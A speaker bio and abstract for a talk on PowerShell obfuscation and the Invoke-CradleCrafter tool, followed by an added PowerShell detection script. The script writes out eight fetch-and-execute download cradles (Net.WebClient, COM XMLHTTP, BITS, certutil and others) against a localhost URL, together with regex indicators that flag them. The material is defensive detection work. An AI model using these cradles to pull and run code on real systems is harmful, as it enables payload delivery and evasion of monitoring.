Incident Response Consultant
Daniel Bohannon is a Senior Incident Response Consultant at MANDIANT with over six years of operations and information security experience. His particular areas of expertise include enterprise-wide incident response investigations, host-based security monitoring, data aggregation and anomaly detection, and PowerShell-based attack research and detection techniques.
As an incident response consultant, Mr. Bohannon provides emergency services to clients when security breaches occur. He also develops new methods for detecting malicious PowerShell usage at both the host- and network-level while researching obfuscation techniques for PowerShell-based attacks that are being used by numerous threat groups.
Prior to joining MANDIANT, Mr. Bohannon spent five years working in both IT operations and information security roles in the private retail industry. There he developed operational processes for the automated aggregation and detection of host- and network-based anomalies in a large PCI environment. Mr. Bohannon also programmed numerous tools for host-based hunting while leading the organization’s incident response team.
Mr. Bohannon received a Master of Science in Information Security from the Georgia Institute of Technology and a Bachelor of Science in Computer Science from The University of Georgia.
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niques') -Join '')
Capable attackers hide their commands from A/V and application whitelisting technologies by using encoded commands and memory-only payloads, which leaves little on disk and makes it hard for Blue Teams to determine what was actually executed on a target system. Network defenders are catching on, however: current detection tooling monitors the command-line arguments of powershell.exe, either in real time at process creation or afterwards from event logs.
As Red Teamers we need new avenues to remain stealthy in a target environment, and as Blue Teamers we need to keep our detection capabilities and defenses current. This talk will highlight a dozen never-before-seen techniques for obfuscating PowerShell command-line arguments and script contents. As an incident responder at Mandiant, I have seen attackers use a handful of these methods to evade basic command-line detection mechanisms. I will share the techniques already being used in the wild so you can understand the value each technique provides to the attacker. In addition, I will highlight artifacts and techniques that defenders can apply to improve their detection of PowerShell that leverages these obfuscation techniques.
In the Fall of 2016 I developed and released an obfuscation framework called Invoke-Obfuscation that is built on this research. My aim for this tool has always been to simplify and automate the application of these obfuscation techniques so defenders can use this framework to test their current detection capabilities against obfuscated PowerShell commands and scripts.
However, due to several design decisions made to maximize flexibility, Invoke-Obfuscation does not contain all of the obfuscation techniques covered in this talk. Many of these techniques exploit obfuscation opportunities that stem from PowerShell's flexibility as a language rather than from pure syntactic obfuscation, encoding and encryption. They focus on the interchangeability of particular PowerShell cmdlets, properties and command ordering, and on the many ways of reaching the underlying .Net methods, COM objects and additional compiled and scripting languages.
I will conclude this talk by releasing a new obfuscation framework called Invoke-CradleCrafter that will house these new obfuscation techniques. This project serves as a living library of PowerShell remote download cradle “genres” and syntaxes. I will give particular focus to the numerous ways within PowerShell, .Net and native Windows applications that this remote download functionality can be accomplished without using .Net’s popular Net.WebClient class. Invoke-CradleCrafter is designed to highlight the interchangeability of each component of each cradle as well as the pros and cons that each cradle offers from both offensive and defensive perspectives. It consists of obfuscation techniques that are almost entirely different from the techniques found in Invoke-Obfuscation. As such it is my hope that Invoke-CradleCrafter will aid Blue Teams in improving their detection of PowerShell remote download cradles that rely on obscure syntaxes, underlying substitution techniques and additional signed native Windows binaries to perform remote download functionality.
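To make the two halves of this abstract concrete, the following is an added example (editor's code, not the talk's material and not part of Invoke-Obfuscation or Invoke-CradleCrafter). It lists several remote download cradle "genres" that all fetch the same URL through different mechanisms (the common Net.WebClient form, cmdlets, .Net WebRequest, two COM HTTP objects, BITS, and the signed native binary certutil.exe), then runs a small detector over constructed powershell.exe command lines. The detector unpacks -EncodedCommand the way a command-line monitor must, and matches indicators for each genre rather than only Net.WebClient. The URL, the sample command lines, the indicator names and the function names are all assumptions made for illustration; the cradle strings are never executed, so the block runs offline.

```powershell
# Added example (editor's code, not from the talk or its tools). Assumed/constructed
# values: $Url, the cradle strings, the indicator table and the sample command lines.
$Url = 'http://127.0.0.1:8000/payload.ps1'

# Interchangeable cradle genres: each string fetches and runs the same URL via a
# different mechanism. They are detector inputs only and are never invoked here.
$Cradles = [ordered]@{
    'Net.WebClient (the common one)'  = "IEX (New-Object Net.WebClient).DownloadString('$Url')"
    'Invoke-WebRequest cmdlet'        = "IEX (Invoke-WebRequest -Uri '$Url' -UseBasicParsing).Content"
    'Invoke-RestMethod cmdlet'        = "IEX (Invoke-RestMethod -Uri '$Url')"
    '.Net WebRequest + StreamReader'  = "IEX (New-Object IO.StreamReader([Net.WebRequest]::Create('$Url').GetResponse().GetResponseStream())).ReadToEnd()"
    'COM Msxml2.XMLHTTP'              = "`$x=New-Object -ComObject Msxml2.XMLHTTP;`$x.Open('GET','$Url',`$false);`$x.Send();IEX `$x.ResponseText"
    'COM WinHttp.WinHttpRequest.5.1'  = "`$w=New-Object -ComObject WinHttp.WinHttpRequest.5.1;`$w.Open('GET','$Url',`$false);`$w.Send();IEX `$w.ResponseText"
    'BITS (Start-BitsTransfer)'       = "Start-BitsTransfer -Source '$Url' -Destination `$env:TEMP\p.ps1; & `$env:TEMP\p.ps1"
    'Signed native binary (certutil)' = "certutil.exe -urlcache -split -f $Url `$env:TEMP\p.ps1"
}

# Indicator table (assumed names): genre -> regex over the decoded command text.
# A Net.WebClient-only signature would miss every row but the first.
$Indicators = [ordered]@{
    'Net.WebClient'            = 'Net\.WebClient'
    'Invoke-WebRequest/alias'  = '\b(Invoke-WebRequest|iwr|curl|wget)\b'
    'Invoke-RestMethod/alias'  = '\b(Invoke-RestMethod|irm)\b'
    '.Net WebRequest'          = 'Net\.(Http)?WebRequest\]?::Create'
    'COM HTTP object'          = 'Msxml2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest'
    'BITS transfer'            = '\bStart-BitsTransfer\b'
    'certutil download'        = 'certutil(\.exe)?\s+.*-urlcache'
    'in-memory execution'      = '\b(IEX|Invoke-Expression)\b'
}

function Get-DecodedCommandLine {
    param([string]$CommandLine)
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    # so match the switch loosely and require a base64 token after it.
    $m = [regex]::Match($CommandLine, '(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})', 'IgnoreCase')
    if ($m.Success) {
        try {
            # -EncodedCommand is base64 over UTF-16LE, not UTF-8.
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
        } catch { return $CommandLine }   # not valid base64 (e.g. -ExecutionPolicy Unrestricted)
    }
    return $CommandLine
}

function Find-CradleIndicator {
    param([string]$CommandLine)
    $text = Get-DecodedCommandLine $CommandLine
    $hits = foreach ($name in $Indicators.Keys) {
        if ($text -match $Indicators[$name]) { $name }   # -match is case-insensitive by default
    }
    [pscustomobject]@{
        WasEncoded = ($text -ne $CommandLine)
        Indicators = @($hits)
        Text       = $text
    }
}

# Constructed sample command lines, as they would appear in Security 4688 (with
# command-line auditing enabled) or Sysmon Event ID 1. One is the COM cradle wrapped
# in -enc; one is benign administration.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Cradles['COM Msxml2.XMLHTTP']))
$Samples = @(
    "powershell.exe -nop -w hidden -enc $encoded"
    "powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"
) + ($Cradles.Values | ForEach-Object { "powershell.exe -nop -w hidden -c `"$_`"" })

$Samples | ForEach-Object {
    $r = Find-CradleIndicator $_
    [pscustomobject]@{
        Encoded    = $r.WasEncoded
        Indicators = ($r.Indicators -join ', ')
        Preview    = $r.Text.Substring(0, [Math]::Min(60, $r.Text.Length))
    }
} | Format-Table -AutoSize
```

Run as a whole in any Windows PowerShell 5.1 or PowerShell 7 session; nothing touches the network. The table shows the benign -File invocation with no indicators, the -enc sample flagged as encoded and attributed to the COM genre, and every cradle row matched by at least one indicator even though only one of them contains the string Net.WebClient. Feeding real 4688, Sysmon or 4104 script block text through Find-CradleIndicator is the obvious next step; the regex table is deliberately small and will need tuning against a given environment's legitimate Invoke-WebRequest and BITS usage.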